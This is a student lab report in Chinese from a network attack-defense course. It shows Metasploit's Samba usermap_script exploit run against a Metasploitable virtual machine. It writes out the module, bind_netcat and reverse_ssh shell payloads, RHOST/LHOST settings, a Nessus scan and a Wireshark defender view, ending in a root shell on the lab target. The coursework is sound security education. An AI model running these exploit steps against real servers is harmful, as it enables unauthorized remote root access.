其他分享
首页 > 其他分享> > 20212903 2021-2022-2 《网络攻防实践》实践7报告

20212903 2021-2022-2 《网络攻防实践》实践7报告

作者:互联网

20212903 2021-2022-2 《网络攻防实践》实践7报告

1.实践内容

Linux系统远程攻防技术

Linux远程口令猜测技术

网络服务远程渗透攻击

img

攻击Linux客户端程序和用户

Linux系统本地安全攻防技术

Linux本地特权提升

Linux系统上的消踪灭迹

Linux系统远程控制后门

2.实践过程

(1)使用Metasploit进行Linux远程渗透攻击

任务:使用Metasploit渗透测试软件,攻击Linux靶机上的Samba服务Usermap_script安全漏洞,获取目标Linux靶机的主机访问权限。实践步骤如下:

①启动Metasploit软件,可根据个人喜好使用msfconsole、msfgui、msfweb之一;

②使用exploit:exploit/multi/samba/usermap_script渗透攻击模块;

③选择攻击PAYLOAD为远程shell,(正向或反向连接均可);

④设置渗透攻击参数(RHOST,LHOST,TARGET等);

⑤执行渗透攻击;

⑥查看是否正确得到远程Shell,并查看获得的权限。

攻击机与靶机信息

虚拟机名称 IP地址
攻击机Kali 192.168.11.136
靶机Metasploitable_ubunutu 192.168.11.191

1、使用指令namp 192.168.11.191查看Samba使用的端口(139号(TCP文件和打印共享)和445号(NetBIOS服务在Windows 2000及以后版本使用此端口)端口)是否开启

通过下图可以看到139和445号端口均为开启状态

image-20220425191832772

2、使用命令msfconsole打开metasploit命令行

image-20220425192023744

查看攻击载荷并设置攻击载荷use exploit/multi/samba/usermap_script和命令show payloads

image-20220425192540811

通过命令set payload cmd/unix/bind_netcat设置为cmd/unix/bind_netcat,表示使用在渗透攻击成功后执行shell并通过netcat绑定在一个监听端口上

image-20220425192839230

使用指令set rhost 192.168.11.191set lhost 192.168.11.136设置目标主机地址和本机地址,并使用show options进行查看

image-20220425193212698

输入指令exploit进行攻击,并输入ifconfig

image-20220425194143702

输入命令whoami查看当前用户

image-20220425194321072

(2)实践作业:攻防对抗实践

攻击机与靶机IP相关信息如下:

虚拟机名称 IP地址
攻击机Kali 172.30.0.245
靶机Metasploitable_ubunutu 172.30.2.96

攻击方

首先利用nessus对靶机Metasploitable_ubunutu进行漏洞扫描

创建Scan,将靶机IP地址输入相应位置

image-20220429092132694

开始扫描

image-20220429092304064

查看扫描结果

image-20220429095608921

发现靶机具有4个危险程度等级为高的漏洞,分别在0,22,445端口号,对应的服务为ssh和cifs

image-20220429092632961

在知道漏洞之后,在kali攻击机中输入命令msfconsole打开攻击软件Metasploit

image-20220429093247741

同第一实践一样,设置攻击载荷use exploit/multi/samba/usermap_script和命令show payloads查看攻击载荷

image-20220429100252156

通过命令set payload /cmd/unix/reverse_ssh设置为/cmd/unix/reverse_ssh

image-20220429100818834

使用指令set rhost 172.30.2.96set lhost 172.30.0.245设置目标主机地址和本机地址,并使用show options进行查看

image-20220429100957052

输入指令exploit进行攻击,结果发现攻击失败

image-20220429101251251

通过防守方抓包分析,建立起的TCP连接被拒绝了

image-20220429101230865

重新选择攻击载荷,利用命令set payload cmd/unix/bind_netcat设置为cmd/unix/bind_netcat

image-20220429102015411

使用指令set rhost 172.30.2.96set lhost 172.30.0.245设置目标主机地址和本机地址,并使用show options进行查看

image-20220429102120846

输入指令exploit进行攻击,输入ifconfig查看IP地址,输入命令whoami查看当前用户

image-20220429102901944

从上图可以看到IP地址为靶机IP,当前用户为ROOT

防守方

从wireshark中抓包可以看出,攻击机与靶机建立了TCP连接

image-20220429103156826

追踪TCP数据流,可以看到与攻击机中输入的命令相同

image-20220429103634762

3.学习中遇到的问题及解决

4.实践总结

通过这次实验,让我学会了如何系统的进行一次进攻,在之前的实验中学会了漏洞搜索,攻击靶机,而在本次实验,我系统的从漏洞搜索,分析漏洞,选择漏洞进行攻击,一套整体流程下来,让我对网络攻防有了新的认识。在攻击成功的瞬间,我内心感到喜悦,体会到了网络攻防的乐趣。同时还需要进一步加强对网络攻防理论上知识的学习

参考资料

标签:20212903,set,攻击,使用,实践,2021,Linux,靶机,远程
来源: https://www.cnblogs.com/william-tony/p/16209468.html